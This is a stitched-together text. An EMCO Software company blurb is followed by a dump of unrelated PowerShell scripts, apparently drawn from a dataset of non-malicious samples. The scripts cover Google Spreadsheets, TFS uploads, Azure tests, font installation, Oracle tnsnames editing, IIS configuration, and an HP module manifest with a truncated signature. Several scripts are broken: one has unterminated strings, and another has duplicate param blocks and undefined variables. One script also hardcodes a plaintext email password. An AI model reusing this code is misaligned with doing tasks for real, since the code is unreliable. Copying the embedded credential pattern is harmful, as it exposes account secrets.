About EMCO SoftwareEMCO UnLock IT 7Copyright © 2001-2024 EMCO. All rights reserved.51Chapter 9: About EMCO SoftwareEMCO creates mission-critical software to manage network computers remotely and automatenetwork administration.Our company was founded in 2001 in Reykjavik, Iceland. Managing Windows networks as networkadministrators, we could not find tools that would help us automate our routine networkadministration tasks, so we decided to create such tools for fellow administrators and ourselves.Today we offer innovative software that help IT specialists and network administrators to automatetheir Windows network management tasks. Our software tools are focused on remote managementof Windows computers across networks and allow administrators to perform routine tasks on allmanaged computers with a few mouse clicks. We automate software audit and deployment, powermanagement, hosts monitoring and other computer administration tasks.Learn more: http://emcosoftware.com.Our CustomersBeing suitable for managing networks of any size, our products cater to the needs of 25,000+customers in 85 countries around the globe. They are Fortune 100 corporations and smallbusinesses, as well as governments, military institutions, universities, public schools, libraries andcharities.Our customers rely on EMCO products for managing their mission-critical network infrastructure.Using our products, network administrators monitor, audit, deploy and manage 3,000,000+ networkdevices every day.
combined_dataset/train/non-malicious/2311.ps1
2311.ps1
$userName = 'adbertram@gmail.com' $password = 'Ilikegmail.' Add-Type -Path "C:\Program Files (x86)\Google\Google Data API SDK\Redist\Google.GData.Client.dll" Add-Type -Path "C:\Program Files (x86)\Google\Google Data API SDK\Redist\Google.GData.Extensions.dll" Add-Type -Path "C:\Program Files (x86)\Google\Google Data API SDK\Redist\Google.GData.Spreadsheets.dll" $service = New-Object Google.GData.Spreadsheets.SpreadsheetsService("TestGoogleDocs") $service.setUserCredentials($userName, $password) $query = New-Object Google.GData.Spreadsheets.SpreadsheetQuery $feed = $service.Query($query) $feed.Entries | foreach { $_.Links | ? {$_.rel -eq "http://schemas.google.com/spreadsheets/2006 % { $query = New-Object Google.GData.Spreadsheets.WorksheetQuery($_.Href) $feed = $service.Query($query) $feed.Entries | % { $_.Title.Text $_.Links | ? { $_.rel -eq "http://schemas.google.com/spreadsheets/2006 % { $listQuery = New-Object Google.GData.Spreadsheets.ListQuery($_.Href) $feed = $service.Query($listQuery) "Worksheet has $($feed.Entries.Count) rows:" $feed.Entries | % { $_.Elements | % { Write-Host -NoNewline "$($_.value)`t" } Write-Host } } } } }
combined_dataset/train/non-malicious/2428.ps1
2428.ps1
param( [Parameter(Mandatory=$true)][string]$FolderPath, [Parameter(Mandatory=$true)][string]$TfsUrl, [PSCredential]$Credential = (Get-Credential), [switch]$Overwrite = $false ) param( [Parameter(Mandatory)] [ValidateNotNullOrEmpty()] [ValidateScript({ if (-not (Test-Path -Path $_ -PathType Container)) { throw "The folder '$($_)' is not available" } if (-not (Test-Path -Path "$_\task.json" -PathType Leaf)) { throw "The file task.json was not found inside of folder '$_'" } $true })] [string]$FolderPath ) function ZipFile { param($FolderPath) } $taskDefinition = (Get-Content $FolderPath\task.json) -join "`n" | ConvertFrom-Json Write-Verbose 'Zipping task content...' $taskZipFilePath = ("{0}\..\{1}.zip" -f $FolderPath, $taskDefinition.id) Remove-Item $taskZipFilePath -ErrorAction SilentlyContinue Add-Type -AssemblyName "System.IO.Compression.FileSystem" [IO.Compression.ZipFile]::CreateFromDirectory($taskFolder, $taskZipFilePath) Write-Verbose "Uploading task content" $headers = @{ "Accept" = "application/json; api-version=2.0-preview"; "X-TFS-FedAuthRedirect" = "Suppress" } $taskZipItem = Get-Item $taskZip $headers.Add("Content-Range", "bytes 0-$($taskZipItem.Length - 1)/$($taskZipItem.Length)") $url = ("{0}/_apis/distributedtask/tasks/{1}" -f $TfsUrl, $taskDefinition.id) if ($Overwrite) { $url += "?overwrite=true" } Invoke-RestMethod -Uri $url -Credential $Credential -Headers $headers -ContentType application/octet-stream -Method Put -InFile $taskZipItem
combined_dataset/train/non-malicious/3973.ps1
3973.ps1
function Test-NotFound { $rgLocation = Get-ProviderLocation ResourceManagement $rgName = Get-ResourceGroupName $pipName = Get-ResourceName try { New-AzResourceGroup -Name $rgName -Location $rgLocation Assert-ThrowsLike { Get-AzPublicIpAddress -ResourceGroupName $rgName -Name $pipName } "*ResourceNotFound*was not found*" } finally { Clean-ResourceGroup $rgName } } function Test-InvalidName { $rgLocation = Get-ProviderLocation ResourceManagement $location = Get-ProviderLocation "Microsoft.Network/publicIpAddresses" $rgName = Get-ResourceGroupName $invalidName = "!" try { New-AzResourceGroup -Name $rgName -Location $rgLocation $scriptBlock = { New-AzPublicIpAddress -ResourceGroupName $rgName -Name $invalidName -Location $location -AllocationMethod Dynamic } Assert-ThrowsLike $scriptBlock "*InvalidResourceName*Resource name ${invalidName} is invalid*" } finally { Clean-ResourceGroup $rgName } } function Test-DuplicateResource { $rgLocation = Get-ProviderLocation ResourceManagement $location = Get-ProviderLocation "Microsoft.Network/virtualNetworks" $rgName = Get-ResourceGroupName $vnetName = Get-ResourceName $subnetName = Get-ResourceName $vnetAddressPrefix = "10.0.0.0/8" $subnetAddressPrefix = "10.0.1.0/24" try { New-AzResourceGroup -Name $rgName -Location $rgLocation $subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix $subnetAddressPrefix $vnet = New-AzVirtualNetwork -ResourceGroupName $rgName -Name $vnetName -Location $location -AddressPrefix $vnetAddressPrefix -Subnet $subnet $vnet.Subnets.Add($subnet) Assert-ThrowsLike { Set-AzVirtualNetwork -VirtualNetwork $vnet } "*InvalidRequestFormat*Additional details*DuplicateResourceName*" } finally { Clean-ResourceGroup $rgName } } function Test-IntersectAddressSpace { $rgLocation = Get-ProviderLocation ResourceManagement $location = Get-ProviderLocation "Microsoft.Network/virtualNetworks" $rgName = Get-ResourceGroupName $vnetName = Get-ResourceName $subnetName = Get-ResourceName $vnetAddressPrefix = "10.0.0.0/8" $subnetAddressPrefix = "10.0.1.0/24" try { New-AzResourceGroup -Name $rgName -Location $rgLocation $subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix $subnetAddressPrefix $vnet = New-AzVirtualNetwork -ResourceGroupName $rgName -Name $vnetName -Location $location -AddressPrefix $vnetAddressPrefix -Subnet $subnet Add-AzVirtualNetworkSubnetConfig -Name "${subnetName}2" -AddressPrefix $subnetAddressPrefix -VirtualNetwork $vnet Assert-ThrowsLike { Set-AzVirtualNetwork -VirtualNetwork $vnet } "*NetcfgInvalidSubnet*Subnet*is not valid in virtual network*" } finally { Clean-ResourceGroup $rgName } } function Test-ErrorResponseException { $rgLocation = Get-ProviderLocation ResourceManagement $rgName = Get-ResourceGroupName $nwName = Get-ResourceName try { New-AzResourceGroup -Name $rgName -Location $rgLocation [array]$nw = Get-AzNetworkWatcher if($nw.Length -gt 0) { $existingLocation = $nw[0].Location Assert-ThrowsLike { New-AzNetworkWatcher -Name $nwName -ResourceGroupName $rgName -Location $existingLocation } "*NetworkWatcherCountLimitReached*" } [array]$availableLocations = (Get-AzResourceProvider -ProviderNamespace "Microsoft.Network" | Where-Object { $_.ResourceTypes.ResourceTypeName -eq "networkWatchers" }).Locations if($availableLocations.Length -gt 0) { $location = Normalize-Location $availableLocations[0] Assert-ThrowsLike { New-AzNetworkWatcher -Name "!" -ResourceGroupName $rgName -Location $location } "*InvalidResourceName*" } } finally { Clean-ResourceGroup $rgName } }
combined_dataset/train/non-malicious/4097.ps1
4097.ps1
[CmdletBinding()] param () function Get-RelativePath { [CmdletBinding()][OutputType([string])] param () $Path = (split-path $SCRIPT:MyInvocation.MyCommand.Path -parent) + "\" Return $Path } Function Install-Fonts { Param ([String]$SourceDirectory, [String]$FontType) $FontType = "*." + $FontType $sa = new-object -comobject shell.application $Fonts = $sa.NameSpace(0x14) $Files = Get-ChildItem $SourceDirectory -Filter $FontType For ($i = 0; $i -lt $Files.Count; $i++) { $FontName = $Files[$i].Name.ToString().Trim() Write-Host "Installing"$FontName"....." -NoNewline $File = $Env:windir + "\Fonts\" + $Files[$i].Name If ((Test-Path $File) -eq $false) { $Fonts.CopyHere($Files[$i].FullName) If ((Test-Path $File) -eq $true) { Write-Host "Installed" -ForegroundColor Yellow } else { Write-Host "Failed" -ForegroundColor Red Exit 1 } } else { Write-Host "Already Installed" -ForegroundColor Yellow } } } Clear-Host $RelativePath = Get-RelativePath $Success = Install-Fonts -SourceDirectory $RelativePath -FontType "ttf"
combined_dataset/train/non-malicious/Add-TnsAdminEntry.ps1
Add-TnsAdminEntry.ps1
param ( [string] $Name = $(Read-Host "Provide a value for parameter 'Name'"), [string] $Protocol = 'TCP', [string] $Hostname = $(Read-Host "Provide a value for parameter 'Hostname'"), [string] $Port = '1521', [string] $Sid = $(Read-Host "Provide a value for parameter 'Sid'"), [System.IO.FileInfo] $File = $(Read-Host "Provide the tnsnames.ora file path") ) function Get-OracleDataSources { [System.reflection.assembly]::LoadWithPartialName("System.Data") $f = [System.Data.Common.DbProviderFactories]::GetFactory("Oracle.DataAccess.Client") if ($f.CanCreateDataSourceEnumerator) { $e = $f.CreateDataSourceEnumerator() $e.GetDataSources() } } function Out-TnsAdminFile { param ( [System.Object[]] $Entries, [System.IO.FileInfo] $File = $(throw "Parameter -File <System.IO.FileInfo> is required.") ) begin { if ($File.Exists) { $originalEntries = @(Get-TnsAdminEntries $File.FullName) } } process { if ($_) { $Entries = @($_) } $Entries | % { $entry = $_ $existingEntry = $originalEntries | ? {$_.Name -eq $entry.Name} if ($existingEntry) { $existingEntry.Name = $entry.Name $existingEntry.Protocol = $entry.Protocol $existingEntry.Host = $entry.Host $existingEntry.Port = $entry.Port $existingEntry.Service = $entry.Service } else { $originalEntries += $entry } } $originalEntries | % { $entry = $_ $Name = $entry.Name $Protocol = $entry.Protocol $Hostname = $entry.Host $Port = $entry.Port $Service = $entry.Service [string] $text += @" $Name = (DESCRIPTION = (ADDRESS_LIST = (ADDRESS = (PROTOCOL = $Protocol)(HOST = $Hostname)(PORT = $Port)) ) (CONNECT_DATA = (SERVICE_NAME = $Service) ) ) "@ } $text | Out-File $File.FullName -Encoding ASCII Remove-Variable text } end {} } function Get-TnsAdminEntries { param ( [System.IO.FileInfo] $File ) begin {} process { if ($_) { $File = [System.IO.FileInfo] $_ } if (!$File) { Write-Error "Parameter -File <System.IO.FileInfo> is required." break } if (!$File.Exists) { Write-Error "'$File.FullName' does not exist." break } [string] $data = gc $File.FullName | ? {!$_.StartsWith('#')} $pattern = '(?<name>^(\\w)+[\\s]*?)|\\)\\)(?<name>\\w+)|HOST=(?<host>\\w+)|PORT=(?<port>\\d+)|PROTOCOL=(?<protocol>\\w+)|SERVICE_NAME=(?<service>\\w+)' $patternMatches = [regex]::Matches($data.Replace(" ", ""), $pattern, [System.Text.RegularExpressions.RegexOptions]::IgnoreCase) $tnsEntries = @() for ($i = 0; $i -lt $patternMatches.Count; $i++) { if ($i -eq 0 -or $i % 5 -eq 0) { $tnsEntry = New-Object System.Object $tnsEntry | Add-Member -type NoteProperty -name Name -value $patternMatches[$i + 0].Groups["name"].value $tnsEntry | Add-Member -type NoteProperty -name Protocol -value $patternMatches[$i + 1].Groups["protocol"].value $tnsEntry | Add-Member -type NoteProperty -name Host -value $patternMatches[$i + 2].Groups["host"].value $tnsEntry | Add-Member -type NoteProperty -name Port -value $patternMatches[$i + 3].Groups["port"].value $tnsEntry | Add-Member -type NoteProperty -name Service -value $patternMatches[$i + 4].Groups["service"].value $tnsEntries += $tnsEntry } } $tnsEntries } end {} } $tnsEntry = New-Object System.Object $tnsEntry | Add-Member -type NoteProperty -name Name -value $Name $tnsEntry | Add-Member -type NoteProperty -name Protocol -value $Protocol $tnsEntry | Add-Member -type NoteProperty -name Host -value $Hostname $tnsEntry | Add-Member -type NoteProperty -name Port -value $Port $tnsEntry | Add-Member -type NoteProperty -name Service -value $Sid $tnsEntry | Out-TnsAdminFile -File $File
combined_dataset/train/non-malicious/1442.ps1
1442.ps1
function Install-CIisVirtualDirectory { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string] $SiteName, [Parameter(Mandatory=$true)] [Alias('Name')] [string] $VirtualPath, [Parameter(Mandatory=$true)] [Alias('Path')] [string] $PhysicalPath, [Switch] $Force ) Set-StrictMode -Version 'Latest' Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState $site = Get-CIisWebsite -Name $SiteName [Microsoft.Web.Administration.Application]$rootApp = $site.Applications | Where-Object { $_.Path -eq '/' } if( -not $rootApp ) { Write-Error ('Default website application not found.') return } $PhysicalPath = Resolve-CFullPath -Path $PhysicalPath $VirtualPath = $VirtualPath.Trim('/') $VirtualPath = '/{0}' -f $VirtualPath $vdir = $rootApp.VirtualDirectories | Where-Object { $_.Path -eq $VirtualPath } if( $Force -and $vdir ) { Write-IisVerbose $SiteName -VirtualPath $VirtualPath 'REMOVE' '' '' $rootApp.VirtualDirectories.Remove($vdir) $site.CommitChanges() $vdir = $null $site = Get-CIisWebsite -Name $SiteName $rootApp = $site.Applications | Where-Object { $_.Path -eq '/' } } $modified = $false if( -not $vdir ) { [Microsoft.Web.Administration.ConfigurationElementCollection]$vdirs = $rootApp.GetCollection() $vdir = $vdirs.CreateElement('virtualDirectory') Write-IisVerbose $SiteName -VirtualPath $VirtualPath 'VirtualPath' '' $VirtualPath $vdir['path'] = $VirtualPath [void]$vdirs.Add( $vdir ) $modified = $true } if( $vdir['physicalPath'] -ne $PhysicalPath ) { Write-IisVerbose $SiteName -VirtualPath $VirtualPath 'PhysicalPath' $vdir['physicalPath'] $PhysicalPath $vdir['physicalPath'] = $PhysicalPath $modified = $true } if( $modified ) { $site.CommitChanges() } }
combined_dataset/train/non-malicious/sample_62_79.ps1
sample_62_79.ps1
# # Copyright 2018-2024 HP Development Company, L.P. # All Rights Reserved. # # NOTICE: All information contained herein is, and remains the property of HP Development Company, L.P. # # The intellectual and technical concepts contained herein are proprietary to HP Development Company, L.P # and may be covered by U.S. and Foreign Patents, patents in process, and are protected by # trade secret or copyright law. Dissemination of this information or reproduction of this material # is strictly forbidden unless prior written permission is obtained from HP Development Company, L.P. @{ RootModule = 'HP.Private.psm1' #FullModuleVersion = '1.7.2.774' ModuleVersion = '1.7.2' GUID = '9F47EFBC-1124-46F3-87AB-F2D15D169CE7' Author = 'HP Development Company, L.P.' CompanyName = 'HP Inc' Copyright = '(C) Copyright 2018-2024 HP Development Company, L.P.' Description = 'Private utility module for HP Client Management Script Library' PowerShellVersion = '5.1' PrivateData = @{ PSData = @{ LicenseUri = 'https://developers.hp.com/node/11493' RequireLicenseAcceptance = $true } # End of PSData hashtable } # End of PrivateData hashtable } # SIG # Begin signature block # MIIoHgYJKoZIhvcNAQcCoIIoDzCCKAsCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDIAIMSCbJwThw6 # ysLiwvoRHMtn1UkwJ/pq8iGmfDXbE6CCDYowggawMIIEmKADAgECAhAIrUCyYNKc # TJ9ezam9k67ZMA0GCSqGSIb3DQEBDAUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNV # BAMTGERpZ2lDZXJ0IFRydXN0ZWQgUm9vdCBHNDAeFw0yMTA0MjkwMDAwMDBaFw0z # NjA0MjgyMzU5NTlaMGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg # SW5jLjFBMD8GA1UEAxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcg # UlNBNDA5NiBTSEEzODQgMjAyMSBDQTEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAw # ggIKAoICAQDVtC9C0CiteLdd1TlZG7GIQvUzjOs9gZdwxbvEhSYwn6SOaNhc9es0 # JAfhS0/TeEP0F9ce2vnS1WcaUk8OoVf8iJnBkcyBAz5NcCRks43iCH00fUyAVxJr # Q5qZ8sU7H/Lvy0daE6ZMswEgJfMQ04uy+wjwiuCdCcBlp/qYgEk1hz1RGeiQIXhF # LqGfLOEYwhrMxe6TSXBCMo/7xuoc82VokaJNTIIRSFJo3hC9FFdd6BgTZcV/sk+F # LEikVoQ11vkunKoAFdE3/hoGlMJ8yOobMubKwvSnowMOdKWvObarYBLj6Na59zHh # 3K3kGKDYwSNHR7OhD26jq22YBoMbt2pnLdK9RBqSEIGPsDsJ18ebMlrC/2pgVItJ # wZPt4bRc4G/rJvmM1bL5OBDm6s6R9b7T+2+TYTRcvJNFKIM2KmYoX7BzzosmJQay # g9Rc9hUZTO1i4F4z8ujo7AqnsAMrkbI2eb73rQgedaZlzLvjSFDzd5Ea/ttQokbI # YViY9XwCFjyDKK05huzUtw1T0PhH5nUwjewwk3YUpltLXXRhTT8SkXbev1jLchAp # QfDVxW0mdmgRQRNYmtwmKwH0iU1Z23jPgUo+QEdfyYFQc4UQIyFZYIpkVMHMIRro # OBl8ZhzNeDhFMJlP/2NPTLuqDQhTQXxYPUez+rbsjDIJAsxsPAxWEQIDAQABo4IB # WTCCAVUwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUaDfg67Y7+F8Rhvv+ # YXsIiGX0TkIwHwYDVR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0P # AQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsGAQUFBwMDMHcGCCsGAQUFBwEBBGswaTAk # BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAC # hjVodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9v # dEc0LmNydDBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5j # b20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNybDAcBgNVHSAEFTATMAcGBWeBDAED # MAgGBmeBDAEEATANBgkqhkiG9w0BAQwFAAOCAgEAOiNEPY0Idu6PvDqZ01bgAhql # +Eg08yy25nRm95RysQDKr2wwJxMSnpBEn0v9nqN8JtU3vDpdSG2V1T9J9Ce7FoFF # UP2cvbaF4HZ+N3HLIvdaqpDP9ZNq4+sg0dVQeYiaiorBtr2hSBh+3NiAGhEZGM1h # mYFW9snjdufE5BtfQ/g+lP92OT2e1JnPSt0o618moZVYSNUa/tcnP/2Q0XaG3Ryw # YFzzDaju4ImhvTnhOE7abrs2nfvlIVNaw8rpavGiPttDuDPITzgUkpn13c5Ubdld # AhQfQDN8A+KVssIhdXNSy0bYxDQcoqVLjc1vdjcshT8azibpGL6QB7BDf5WIIIJw # 8MzK7/0pNVwfiThV9zeKiwmhywvpMRr/LhlcOXHhvpynCgbWJme3kuZOX956rEnP # LqR0kq3bPKSchh/jwVYbKyP/j7XqiHtwa+aguv06P0WmxOgWkVKLQcBIhEuWTatE # QOON8BUozu3xGFYHKi8QxAwIZDwzj64ojDzLj4gLDb879M4ee47vtevLt/B3E+bn # KD+sEq6lLyJsQfmCXBVmzGwOysWGw/YmMwwHS6DTBwJqakAwSEs0qFEgu60bhQji # WQ1tygVQK+pKHJ6l/aCnHwZ05/LWUpD9r4VIIflXO7ScA+2GRfS0YW6/aOImYIbq # yK+p/pQd52MbOoZWeE4wggbSMIIEuqADAgECAhAJvPMqSNxAYhV5FFpsbzOhMA0G # CSqGSIb3DQEBCwUAMGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg # SW5jLjFBMD8GA1UEAxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcg # UlNBNDA5NiBTSEEzODQgMjAyMSBDQTEwHhcNMjQwMjE1MDAwMDAwWhcNMjUwMjE4 # MjM1OTU5WjBaMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAG # A1UEBxMJUGFsbyBBbHRvMRAwDgYDVQQKEwdIUCBJbmMuMRAwDgYDVQQDEwdIUCBJ # bmMuMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEApbF6fMFy6zhGVra3 # SZN418Cp2O8kjihQCU9tqPO9tkzbMyTsgveLJVnXPJNG9kQPMGUNp+wEHcoUzlRc # YJMEL9fhfzpWPeSIIezGLPCdrkMmS3fdRUwFqEs7z/C6Ui2ZqMaKhKjBJTIWnipe # rRfzGB7RoLepQcgqeF5s0DBy4oG83dqcRHo3IJRTBg39tHe3mD5uoGHn5n366abX # vC+k53BVyD8w8XLppFVH5XuNlXMq/Ohf613i7DRb/+u92ZiAPVPXXnlxUE26cuDb # OfJKN/bXPmvnWcNW3YHVp9ztPTQZhX4yWYXHrAI2Cv6HxUpO6NzhFoRoBTkcYNbA # 91pf1Vagh/MNcA2BfQYT975/Vlvj9cfEZ/NwZthZuHa3rdrvCKhhjw7YU2QUeaTJ # 0uaX4g6B9PFNqAASYLach3CDJiLmYEfus/utPh57mk0q27yL25fXo/PaMDXiDNIi # 7Wuz7A+sPsbtdiY8zvEIRQ+XJXtKAlD4tqG9YzlTO6ZoQX/rAgMBAAGjggIDMIIB # /zAfBgNVHSMEGDAWgBRoN+Drtjv4XxGG+/5hewiIZfROQjAdBgNVHQ4EFgQURH4F # u5yEAuElYWUbyGRYkNLLrA8wPgYDVR0gBDcwNTAzBgZngQwBBAEwKTAnBggrBgEF # BQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMA4GA1UdDwEB/wQEAwIH # gDATBgNVHSUEDDAKBggrBgEFBQcDAzCBtQYDVR0fBIGtMIGqMFOgUaBPhk1odHRw # Oi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkRzRDb2RlU2lnbmlu # Z1JTQTQwOTZTSEEzODQyMDIxQ0ExLmNybDBToFGgT4ZNaHR0cDovL2NybDQuZGln # aWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25pbmdSU0E0MDk2U0hB # Mzg0MjAyMUNBMS5jcmwwgZQGCCsGAQUFBwEBBIGHMIGEMCQGCCsGAQUFBzABhhho # dHRwOi8vb2NzcC5kaWdpY2VydC5jb20wXAYIKwYBBQUHMAKGUGh0dHA6Ly9jYWNl # cnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNB # NDA5NlNIQTM4NDIwMjFDQTEuY3J0MAkGA1UdEwQCMAAwDQYJKoZIhvcNAQELBQAD # ggIBAFiCyuI6qmaQodDyMNpp0l7eIXFgJ4JI59o59PleFj4rcyd/+F4iI7u5if8G # rV5Kn3s3tK9vfJO8SpqtEh7lL4e69z6v3ohcy4uy2hsjKQ/fFcDo9pQYDGmDVjCa # D5qSVEIBlJHBe5NKEJAgUE0kaMjLzbi2+8DKJlNtvZ+hatuPl9fMnmU+VbQh7JhZ # yJdz8Ay0tcQ9lC8HAX5Ah/pU+Vtv+c8gMSxjS1aWXoGCa1869IVi2O6qx7MuX12U # 1eIpB9XxYr7HSebvg2G7Gz6nCh7u+4k7m3hJu9EStUIN2JII5260+E60uDWoHEhx # tHbdueFQxJrTKnhplOSaaPFCVBDkWG83ZzN9N3z/45w1pBUNBiPJdRQJ58MhBYQe # Zl90heMBL8QNQk2i0E5gHNT9pJiCR9+mvJkRxEVgUn+16ZpVnI6kzhThV9qBaWVF # h83X4UWc/nwHKIuu+4x4fmkYc79A3MrsHflZIO8jOy0GC/xBnZTQ8s5b9Tb2UkHk # w692Ypl7War3W7M37JCAPC/A7M4CwQYjdjG43zs5m36auYVaTvRLKtZVLzcj8oZX # 4vqhlZ8+jCPXFiuDfoBXiTckTLpv/eHQ6q7Aoda+qARWPPE1U2v5r/lpKVqIx7B4 # PdFZAUf5MtG/Bj7LVXvXjW8ABIJv7L4cI2akn6Es0dmvd6PsMYIZ6jCCGeYCAQEw # fTBpMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xQTA/BgNV # BAMTOERpZ2lDZXJ0IFRydXN0ZWQgRzQgQ29kZSBTaWduaW5nIFJTQTQwOTYgU0hB # Mzg0IDIwMjEgQ0ExAhAJvPMqSNxAYhV5FFpsbzOhMA0GCWCGSAFlAwQCAQUAoHww # EAYKKwYBBAGCNwIBDDECMAAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYK # KwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIKz3Envh # RO4OUQqnHV0UQAK4WLEe0YzGRzF3lFLQ/xA5MA0GCSqGSIb3DQEBAQUABIIBgBv7 # NXqNvXpJYOGMIwpZI84asviWtKF8BbdAp6JIZUHEAmn+tB4L9pudwLfWjJyRqow0 # dWonMLZARpIKKv+Ft4czKPodS5VhmwUuy2gHYGr2bbJVwKqZNzB2Y4PNhlmS4Lc9 # i8oiZ0YzbP2mtMZXvRRPgO5gzwDeOoJbvLpECudFekvIlKzIWFYOyvzS69pWHFiu # cgAL8Y77r1TKfCNIdfG5zNnXRj9XKjUjyfKJ9sXQ2Tz4yCuIGbERlR+10h90ZO1/ # vE3wIHwCsqUwB7kwcp0sKjVy4fzWe304KFFfbQb0ApKv2uZLKLWJ0Y3ETPpobsFE # HKb3T/UK4wivrVQ9dtxpiESfMb4VPtUEo8X4tBjhh+1/4j1QUsMRKamfbpcuOUEK # js++b0WNRQWOjOktbOczDgLpHm0v1uaNSOBJkVDANQCen6RVUvBcfs+zqwTz09w/ # bKABISsgKbRbsVqjZfPfizXKYtwfCI9VYVvnbPxq9jQ8PtmmQpT62BDy6euE2aGC # F0Awghc8BgorBgEEAYI3AwMBMYIXLDCCFygGCSqGSIb3DQEHAqCCFxkwghcVAgED # MQ8wDQYJYIZIAWUDBAIBBQAweAYLKoZIhvcNAQkQAQSgaQRnMGUCAQEGCWCGSAGG # /WwHATAxMA0GCWCGSAFlAwQCAQUABCB3NTTzX6sC3i1afq++5My0F56p+NiIyV2Y # geBO/IM2ywIRAMDAnBk8gq5uBkqHVxlocQcYDzIwMjQwODI3MTY1NTQ4WqCCEwkw # ggbCMIIEqqADAgECAhAFRK/zlJ0IOaa/2z9f5WEWMA0GCSqGSIb3DQEBCwUAMGMx # CzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7MDkGA1UEAxMy # RGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1lU3RhbXBpbmcg # Q0EwHhcNMjMwNzE0MDAwMDAwWhcNMzQxMDEzMjM1OTU5WjBIMQswCQYDVQQGEwJV # UzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xIDAeBgNVBAMTF0RpZ2lDZXJ0IFRp # bWVzdGFtcCAyMDIzMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAo1NF # hx2DjlusPlSzI+DPn9fl0uddoQ4J3C9Io5d6OyqcZ9xiFVjBqZMRp82qsmrdECmK # HmJjadNYnDVxvzqX65RQjxwg6seaOy+WZuNp52n+W8PWKyAcwZeUtKVQgfLPywem # MGjKg0La/H8JJJSkghraarrYO8pd3hkYhftF6g1hbJ3+cV7EBpo88MUueQ8bZlLj # yNY+X9pD04T10Mf2SC1eRXWWdf7dEKEbg8G45lKVtUfXeCk5a+B4WZfjRCtK1ZXO # 7wgX6oJkTf8j48qG7rSkIWRw69XloNpjsy7pBe6q9iT1HbybHLK3X9/w7nZ9MZll # R1WdSiQvrCuXvp/k/XtzPjLuUjT71Lvr1KAsNJvj3m5kGQc3AZEPHLVRzapMZoOI # aGK7vEEbeBlt5NkP4FhB+9ixLOFRr7StFQYU6mIIE9NpHnxkTZ0P387RXoyqq1AV # ybPKvNfEO2hEo6U7Qv1zfe7dCv95NBB+plwKWEwAPoVpdceDZNZ1zY8SdlalJPrX # xGshuugfNJgvOuprAbD3+yqG7HtSOKmYCaFxsmxxrz64b5bV4RAT/mFHCoz+8LbH # 1cfebCTwv0KCyqBxPZySkwS0aXAnDU+3tTbRyV8IpHCj7ArxES5k4MsiK8rxKBMh # SVF+BmbTO77665E42FEHypS34lCh8zrTioPLQHsCAwEAAaOCAYswggGHMA4GA1Ud # DwEB/wQEAwIHgDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUFBwMI # MCAGA1UdIAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwHATAfBgNVHSMEGDAWgBS6 # FtltTYUvcyl2mi91jGogj57IbzAdBgNVHQ4EFgQUpbbvE+fvzdBkodVWqWUxo97V # 40kwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0Rp # Z2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVTdGFtcGluZ0NBLmNybDCB # kAYIKwYBBQUHAQEEgYMwgYAwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2lj # ZXJ0LmNvbTBYBggrBgEFBQcwAoZMaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29t # L0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVTdGFtcGluZ0NBLmNy # dDANBgkqhkiG9w0BAQsFAAOCAgEAgRrW3qCptZgXvHCNT4o8aJzYJf/LLOTN6l0i # kuyMIgKpuM+AqNnn48XtJoKKcS8Y3U623mzX4WCcK+3tPUiOuGu6fF29wmE3aEl3 # o+uQqhLXJ4Xzjh6S2sJAOJ9dyKAuJXglnSoFeoQpmLZXeY/bJlYrsPOnvTcM2Jh2 # 